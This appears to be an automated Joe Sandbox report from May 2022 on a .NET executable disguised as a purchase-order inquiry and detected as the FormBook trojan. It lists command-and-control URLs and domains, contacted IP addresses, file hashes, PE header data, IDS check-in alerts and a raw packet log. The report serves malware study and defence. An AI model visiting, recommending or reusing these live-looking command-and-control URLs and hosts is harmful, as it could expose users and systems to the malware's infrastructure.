        http://www.route112mitsubishi.com/j86w/?r0DdqnX=5yG98xSZmOV+Ql/97UdClrpjSiEw17qCWMbIEAVNPxEJnvqug39wnIBGciaFjvLM3BZW&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.sajatypeworks.comria0%Avira URL Cloudsafe
        http://www.iguaym.com/j86w/?r0DdqnX=tkiTgEDY4Ttp5hV2NAZpvKTOl2tMD45nnNA9HzUYoopeMx94i1T5F8wdRmJN6yWBJNpO&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.sajatypeworks.coms-e0%Avira URL Cloudsafe
        http://www.deta-hedman.com/j86w/?r0DdqnX=Kkb0DjnINT29w7Qrg2PFxeNyGIRzhfaNNN9zf2FlHT6WK5ZN02NS1QMbiS9ATrkigRb2&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.sajatypeworks.com.40x0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        pieprop.com
        34.102.136.180
        truefalse
          unknown
          td-ccm-168-233.wixdns.net
          34.117.168.233
          truetrue
            unknown
            www.iguaym.com
            156.226.250.150
            truetrue
              unknown
              www.jupiter-directory.info
              81.171.22.6
              truetrue
                unknown
                trustedhomebuying.com
                38.143.25.232
                truetrue
                  unknown
                  route112mitsubishi.com
                  34.102.136.180
                  truefalse
                    unknown
                    parking.namesilo.com
                    209.141.38.71
                    truefalse
                      high
                      parkingpage.namecheap.com
                      198.54.117.210
                      truefalse
                        high
                        www.burntkeroseneblueheelers.com
                        104.21.27.132
                        truetrue
                          unknown
                          www.lingmao08.com
                          172.67.219.19
                          truetrue
                            unknown
                            www.theminercrypto.com
                            217.160.0.206
                            truetrue
                              unknown
                              shops.myshopify.com
                              23.227.38.74
                              truetrue
                                unknown
                                deta-hedman.com
                                37.97.135.188
                                truetrue
                                  unknown
                                  www.tsreaur.com
                                  165.231.150.75
                                  truetrue
                                    unknown
                                    heiboard.xyz
                                    34.102.136.180
                                    truefalse
                                      unknown
                                      shops.mycartpanda.com
                                      104.16.100.51
                                      truetrue
                                        unknown
                                        danilhodoekhi.com
                                        15.197.142.173
                                        truetrue
                                          unknown
                                          www.shantellonlineshoph.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.jamiebakes.net
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.funserve.club
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.pieprop.com
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.gsibralstar1.com
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.deta-hedman.com
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      www.popcornpor.xyz
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        www.trustedhomebuying.com
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          www.route112mitsubishi.com
                                                          unknown
                                                          unknowntrue
                                                            unknown
                                                            www.danilhodoekhi.com
                                                            unknown
                                                            unknowntrue
                                                              unknown
                                                              www.medicaleducationbangladesh.com
                                                              unknown
                                                              unknowntrue
                                                                unknown
                                                                www.heiboard.xyz
                                                                unknown
                                                                unknowntrue
                                                                  unknown
                                                                  www.expoj3.com
                                                                  unknown
                                                                  unknowntrue
                                                                    unknown
                                                                    NameMaliciousAntivirus DetectionReputation
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 633628
Start date and time: 2022-05-25 00:34:33 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 5s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: PO-INQUIRY-VALE-SP-2022-60.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@22/17
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 42.3% (good quality ratio 37.7%)
• Quality average: 73.1%
• Quality standard deviation: 32%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 75
• Number of non-executed functions: 126
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, ctldl.windowsupdate.com, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
Time | Type | Description
00:35:54 | API Interceptor | 1x Sleep call for process: PO-INQUIRY-VALE-SP-2022-60.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                          Process:C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1308
                                                                                          Entropy (8bit):5.345811588615766
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                                                          MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                                                          SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                                                          SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                                                          SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.95001008492212
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:PO-INQUIRY-VALE-SP-2022-60.exe
                                                                                          File size:544768
                                                                                          MD5:86dd400e33efa12ea4cbac3d29000e41
                                                                                          SHA1:d2ca57eb8122a98cd03daf63532e9717f362f808
                                                                                          SHA256:6ccee842a4957d3410ae6163bb96a9b7739b3ffc3032dfeeb2a3c7b273ca5656
                                                                                          SHA512:1372d99cf209af5ef91acb517f21ba3fd9cb77ea7952c1975188bd91be06ccfa12c1ab8bc436c50ad6eff99c718304866bde771a1a069bb38d16ef8192bc5760
                                                                                          SSDEEP:12288:ZD305MvHEaTlg0pRQi6QSH2TlpBnDAlVvXH/diI:ZD308HEElg0pR+QSHirmZXH7
                                                                                          TLSH:33C4122037780FAFE9E85BF57415415003B6D0ABA8A0F3E04E9AD1F96D3170ACA91E73
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."3.b..............0..D...........c... ........@.. ....................................@................................
                                                                                          Icon Hash:00828e8e8686b000
                                                                                          Entrypoint:0x4863c2
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                          Time Stamp:0x628D3322 [Tue May 24 19:33:54 2022 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x86370          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x88000          0x614         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8a000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x843c8       0x84400   False     0.957808438681   data       7.95977634644   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x88000          0x614         0x800     False     0.33056640625    data       3.47019410663   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x8a000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                         Language  Country
RT_VERSION   0x88090  0x384  data
RT_MANIFEST  0x88424  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
DLL          Import
mscoree.dll  _CorExeMain
Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2016
Assembly Version  1.0.0.0
InternalName      CDSCollectionETWBCLProvi.exe
FileVersion       1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName       BookShopDialogBoxes
ProductVersion    1.0.0.0
FileDescription   BookShopDialogBoxes
OriginalFilename  CDSCollectionETWBCLProvi.exe
Timestamp                 Protocol  SID      Message                                Source Port  Dest Port  Source IP    Dest IP
05/25/22-00:37:20.692347  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)   49790        80         192.168.2.5  37.97.135.188
05/25/22-00:39:41.286145  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)   49817        80         192.168.2.5  217.160.0.206
05/25/22-00:39:41.286145  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)   49817        80         192.168.2.5  217.160.0.206
05/25/22-00:37:47.119066  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)   49796        80         192.168.2.5  156.226.250.150
05/25/22-00:37:47.119066  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)   49796        80         192.168.2.5  156.226.250.150
05/25/22-00:39:25.738101  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)   49813        80         192.168.2.5  198.54.117.217
05/25/22-00:39:25.738101  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)   49813        80         192.168.2.5  198.54.117.217
05/25/22-00:39:30.985747  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)   49815        80         192.168.2.5  172.67.219.19
05/25/22-00:37:52.815294  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)   49797        80         192.168.2.5  209.141.38.71
05/25/22-00:37:41.464118  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)   49795        80         192.168.2.5  165.231.150.75
05/25/22-00:39:30.985747  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)   49815        80         192.168.2.5  172.67.219.19
05/25/22-00:39:20.297081  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)   49811        80         192.168.2.5  104.21.27.132
05/25/22-00:38:29.606349  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)   49805        80         192.168.2.5  38.143.25.232
05/25/22-00:38:29.606349  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)   49805        80         192.168.2.5  38.143.25.232
05/25/22-00:39:20.297081  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)   49811        80         192.168.2.5  104.21.27.132
05/25/22-00:37:41.464118  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)   49795        80         192.168.2.5  165.231.150.75
05/25/22-00:37:47.119066  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)   49796        80         192.168.2.5  156.226.250.150
05/25/22-00:37:52.815294  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)   49797        80         192.168.2.5  209.141.38.71
05/25/22-00:37:52.815294  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)   49797        80         192.168.2.5  209.141.38.71
05/25/22-00:39:30.985747  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)   49815        80         192.168.2.5  172.67.219.19
05/25/22-00:39:41.286145  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)   49817        80         192.168.2.5  217.160.0.206
05/25/22-00:37:20.692347  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)   49790        80         192.168.2.5  37.97.135.188
05/25/22-00:39:20.297081  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)   49811        80         192.168.2.5  104.21.27.132
05/25/22-00:37:20.692347  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)   49790        80         192.168.2.5  37.97.135.188
05/25/22-00:38:29.606349  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)   49805        80         192.168.2.5  38.143.25.232
05/25/22-00:37:41.464118  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)   49795        80         192.168.2.5  165.231.150.75
05/25/22-00:39:25.738101  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)   49813        80         192.168.2.5  198.54.117.217
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                          May 25, 2022 00:37:30.872692108 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916320086 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916357040 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916374922 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916393995 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916407108 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916419983 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916433096 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916493893 CEST4979180192.168.2.523.227.38.74
                                                                                          May 25, 2022 00:37:30.916593075 CEST4979180192.168.2.523.227.38.74
                                                                                          May 25, 2022 00:37:30.936316013 CEST4979180192.168.2.523.227.38.74
                                                                                          May 25, 2022 00:37:35.999466896 CEST4979380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:37:36.024611950 CEST804979334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:37:36.025650024 CEST4979380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:37:36.025887966 CEST4979380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:37:36.051178932 CEST804979334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:37:36.150230885 CEST804979334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:37:36.150414944 CEST804979334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:37:36.150701046 CEST4979380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:37:36.150758982 CEST4979380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:37:36.173666954 CEST804979334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:37:41.342313051 CEST4979580192.168.2.5165.231.150.75
                                                                                          May 25, 2022 00:37:41.461620092 CEST8049795165.231.150.75192.168.2.5
                                                                                          May 25, 2022 00:37:41.461791039 CEST4979580192.168.2.5165.231.150.75
                                                                                          May 25, 2022 00:37:41.464118004 CEST4979580192.168.2.5165.231.150.75
                                                                                          May 25, 2022 00:37:41.582832098 CEST8049795165.231.150.75192.168.2.5
                                                                                          May 25, 2022 00:37:41.582911015 CEST8049795165.231.150.75192.168.2.5
                                                                                          May 25, 2022 00:37:41.582940102 CEST8049795165.231.150.75192.168.2.5
                                                                                          May 25, 2022 00:37:41.583089113 CEST4979580192.168.2.5165.231.150.75
                                                                                          May 25, 2022 00:37:41.583175898 CEST4979580192.168.2.5165.231.150.75
                                                                                          May 25, 2022 00:37:41.701999903 CEST8049795165.231.150.75192.168.2.5
                                                                                          May 25, 2022 00:37:46.799782038 CEST4979680192.168.2.5156.226.250.150
                                                                                          May 25, 2022 00:37:47.118558884 CEST8049796156.226.250.150192.168.2.5
                                                                                          May 25, 2022 00:37:47.118762970 CEST4979680192.168.2.5156.226.250.150
                                                                                          May 25, 2022 00:37:47.119066000 CEST4979680192.168.2.5156.226.250.150
                                                                                          May 25, 2022 00:37:47.437657118 CEST8049796156.226.250.150192.168.2.5
                                                                                          May 25, 2022 00:37:47.438154936 CEST8049796156.226.250.150192.168.2.5
                                                                                          May 25, 2022 00:37:47.438170910 CEST8049796156.226.250.150192.168.2.5
                                                                                          May 25, 2022 00:37:47.438314915 CEST4979680192.168.2.5156.226.250.150
                                                                                          May 25, 2022 00:37:47.438410044 CEST4979680192.168.2.5156.226.250.150
                                                                                          May 25, 2022 00:37:47.756680012 CEST8049796156.226.250.150192.168.2.5
                                                                                          May 25, 2022 00:37:52.624475002 CEST4979780192.168.2.5209.141.38.71
                                                                                          May 25, 2022 00:37:52.813425064 CEST8049797209.141.38.71192.168.2.5
                                                                                          May 25, 2022 00:37:52.815067053 CEST4979780192.168.2.5209.141.38.71
                                                                                          May 25, 2022 00:37:52.815294027 CEST4979780192.168.2.5209.141.38.71
                                                                                          May 25, 2022 00:37:53.008251905 CEST8049797209.141.38.71192.168.2.5
                                                                                          May 25, 2022 00:37:53.008518934 CEST8049797209.141.38.71192.168.2.5
                                                                                          May 25, 2022 00:37:53.008539915 CEST8049797209.141.38.71192.168.2.5
                                                                                          May 25, 2022 00:37:53.009113073 CEST4979780192.168.2.5209.141.38.71
                                                                                          May 25, 2022 00:37:53.009255886 CEST4979780192.168.2.5209.141.38.71
                                                                                          May 25, 2022 00:37:53.195764065 CEST8049797209.141.38.71192.168.2.5
                                                                                          May 25, 2022 00:37:58.059820890 CEST4979880192.168.2.5198.54.117.210
                                                                                          May 25, 2022 00:37:58.239289045 CEST8049798198.54.117.210192.168.2.5
                                                                                          May 25, 2022 00:37:58.239367962 CEST4979880192.168.2.5198.54.117.210
                                                                                          May 25, 2022 00:37:58.239535093 CEST4979880192.168.2.5198.54.117.210
                                                                                          May 25, 2022 00:37:58.418458939 CEST8049798198.54.117.210192.168.2.5
                                                                                          May 25, 2022 00:37:58.418483019 CEST8049798198.54.117.210192.168.2.5
                                                                                          May 25, 2022 00:38:03.465059996 CEST4979980192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:38:03.488214970 CEST8049799104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:38:03.488447905 CEST4979980192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:38:03.488841057 CEST4979980192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:38:03.511718988 CEST8049799104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:38:03.523833036 CEST8049799104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:38:03.523925066 CEST8049799104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:38:03.524005890 CEST4979980192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:38:03.524063110 CEST4979980192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:38:03.546835899 CEST8049799104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:38:08.738053083 CEST4980280192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:38:08.760759115 CEST804980215.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:38:08.760854959 CEST4980280192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:38:08.761045933 CEST4980280192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:38:08.783652067 CEST804980215.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:38:08.813968897 CEST804980215.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:38:08.814003944 CEST804980215.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:38:08.814198017 CEST4980280192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:38:08.827193022 CEST804980215.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:38:08.827344894 CEST4980280192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:38:08.844485998 CEST4980280192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:38:08.868444920 CEST804980215.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:38:13.882728100 CEST4980380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:13.906682014 CEST804980334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:13.906847000 CEST4980380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:13.906961918 CEST4980380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:13.930476904 CEST804980334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:14.031169891 CEST804980334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:14.031200886 CEST804980334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:14.031368971 CEST4980380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:14.031408072 CEST4980380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:14.332645893 CEST4980380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:14.357192039 CEST804980334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:19.078668118 CEST4980480192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:38:19.102339029 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.102459908 CEST4980480192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:38:19.102739096 CEST4980480192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:38:19.127269983 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.173266888 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.173296928 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.173317909 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.173332930 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.173348904 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.173547983 CEST4980480192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:38:19.173577070 CEST4980480192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:38:19.173579931 CEST4980480192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:38:29.424401045 CEST4980580192.168.2.538.143.25.232
                                                                                          May 25, 2022 00:38:29.604003906 CEST804980538.143.25.232192.168.2.5
                                                                                          May 25, 2022 00:38:29.604204893 CEST4980580192.168.2.538.143.25.232
                                                                                          May 25, 2022 00:38:29.606348991 CEST4980580192.168.2.538.143.25.232
                                                                                          May 25, 2022 00:38:29.785722017 CEST804980538.143.25.232192.168.2.5
                                                                                          May 25, 2022 00:38:29.785756111 CEST804980538.143.25.232192.168.2.5
                                                                                          May 25, 2022 00:38:29.785772085 CEST804980538.143.25.232192.168.2.5
                                                                                          May 25, 2022 00:38:29.785974026 CEST4980580192.168.2.538.143.25.232
                                                                                          May 25, 2022 00:38:30.027720928 CEST4980580192.168.2.538.143.25.232
                                                                                          May 25, 2022 00:38:30.207782984 CEST804980538.143.25.232192.168.2.5
                                                                                          May 25, 2022 00:38:35.118177891 CEST4980680192.168.2.581.171.22.6
                                                                                          May 25, 2022 00:38:35.148804903 CEST804980681.171.22.6192.168.2.5
                                                                                          May 25, 2022 00:38:35.148958921 CEST4980680192.168.2.581.171.22.6
                                                                                          May 25, 2022 00:38:35.149188995 CEST4980680192.168.2.581.171.22.6
                                                                                          May 25, 2022 00:38:35.180242062 CEST804980681.171.22.6192.168.2.5
                                                                                          May 25, 2022 00:38:35.213639975 CEST804980681.171.22.6192.168.2.5
                                                                                          May 25, 2022 00:38:35.213973999 CEST4980680192.168.2.581.171.22.6
                                                                                          May 25, 2022 00:38:35.214118004 CEST804980681.171.22.6192.168.2.5
                                                                                          May 25, 2022 00:38:35.214227915 CEST4980680192.168.2.581.171.22.6
                                                                                          May 25, 2022 00:38:35.244617939 CEST804980681.171.22.6192.168.2.5
                                                                                          May 25, 2022 00:38:40.296355963 CEST4980880192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:40.321113110 CEST804980834.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:40.321276903 CEST4980880192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:40.324682951 CEST4980880192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:40.349323988 CEST804980834.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:40.447870016 CEST804980834.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:40.447915077 CEST804980834.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:40.448122978 CEST4980880192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:40.448157072 CEST4980880192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:40.756629944 CEST4980880192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:40.781158924 CEST804980834.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:39:04.533901930 CEST4980980192.168.2.5198.54.117.218
                                                                                          May 25, 2022 00:39:04.706679106 CEST8049809198.54.117.218192.168.2.5
                                                                                          May 25, 2022 00:39:04.706762075 CEST4980980192.168.2.5198.54.117.218
                                                                                          May 25, 2022 00:39:04.706912041 CEST4980980192.168.2.5198.54.117.218
                                                                                          May 25, 2022 00:39:04.879970074 CEST8049809198.54.117.218192.168.2.5
                                                                                          May 25, 2022 00:39:04.879993916 CEST8049809198.54.117.218192.168.2.5
                                                                                          May 25, 2022 00:39:14.949737072 CEST4981080192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:39:14.975008011 CEST804981034.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:39:14.975383043 CEST4981080192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:39:14.975522041 CEST4981080192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:39:15.000293016 CEST804981034.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:39:15.099600077 CEST804981034.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:39:15.099642992 CEST804981034.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:39:15.099984884 CEST4981080192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:39:15.100075006 CEST4981080192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:39:15.400177956 CEST4981080192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:39:15.422959089 CEST804981034.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:39:20.254220009 CEST4981180192.168.2.5104.21.27.132
                                                                                          May 25, 2022 00:39:20.291886091 CEST8049811104.21.27.132192.168.2.5
                                                                                          May 25, 2022 00:39:20.291977882 CEST4981180192.168.2.5104.21.27.132
                                                                                          May 25, 2022 00:39:20.297080994 CEST4981180192.168.2.5104.21.27.132
                                                                                          May 25, 2022 00:39:20.334809065 CEST8049811104.21.27.132192.168.2.5
